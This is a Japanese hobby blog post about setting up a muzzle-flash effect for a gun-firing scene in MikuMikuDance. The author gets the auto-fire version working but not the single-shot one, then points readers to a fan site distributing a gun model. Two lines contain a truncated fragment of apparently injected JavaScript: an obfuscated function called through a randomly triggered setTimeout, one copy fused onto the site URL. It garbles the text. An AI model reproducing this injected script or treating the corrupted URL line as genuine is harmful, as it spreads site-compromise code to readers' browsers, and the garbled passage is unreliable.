【MMD】銃を撃つシーンのエフェクトをどうしよう その2

前の投稿記事でビームマンPが公開しているMMEでできないかとKOB@さんよりコメントをもらいました。
そして、思い出しました。

この動画のマルズファッシュですね!!


ということで早速試してみました。

DLすると、単発用と自動連射用にフォルダが分かれてました。
今回は単発なので単発用のフォルダを開いていくとmzflash.xがあったのでアクセサリで読み込み。
表示位置をダミーボーンで設定するけど、なにも表示されない。

readme.txtを読んでみると
「Tr値でアニメーションを操作します。」
とある。

0を1にしたり、0.5にしてみたが変化なし。

むむ、わからない。

「単発・マズルフラッシュ用ポイントライト」フォルダにあったファイルも設定してみる。
同じフォルダにあるreadme.txtを読みながら設定。

ちなみに、
「PointLightモデルアクセ(改名配置)用.fx」を
咲音メイコ.pmdに設定する場合
咲音メイコ[PointLightモデルアクセ(改名配置)用.fx].pmd
とするのでいいのかな。

たぶん。

そして、咲音メイコ[PointLightモデルアクセ(改名配置)用.fx].pmdをモデルで読み込んでみる。
すると、MEIKOさんがぴかぴか点滅しはじめた。

これは、銃の発射にともない、人物とかが光ることを意識したものか。
これはこれでいるけど、いまは銃の先端で爆発みたいなエフェクトが表示したい。

うまくいかない orz


試しに、「自動連射用」フォルダにある「mzflash.x」を読んだらダダダダ~みたいな感じで
エフェクトがちゃんと表示された。

単発はどうすればいいのか、わからないままです(困)

ちなみに、自動連射用の1カットの画像。
なかなかいい感じ。
あとは単発用の設定方法だけか・・・
dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}
そうそう、マミさんの銃のモデルが公開されてるのをしりました。
マシシさんが遊んでいた画像でたまたま知り、公開しているというのを教えてもらいました。ありがとうございます!!

公開されている場所は以下のサイトです。
+くら 雑記 MMDデータ
dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}http://pluskura.blog90.fc2.com/
カテゴリの中の「MMDデータ」をみると見つかります。
魔法少女まどか☆マギカ 巴 マミ 【MMDモデルデータ配布】に同梱されています。

または、くらさんが投稿した以下の紹介動画の投稿者コメントにあるURLからダウンロードしてください。

コメントを残す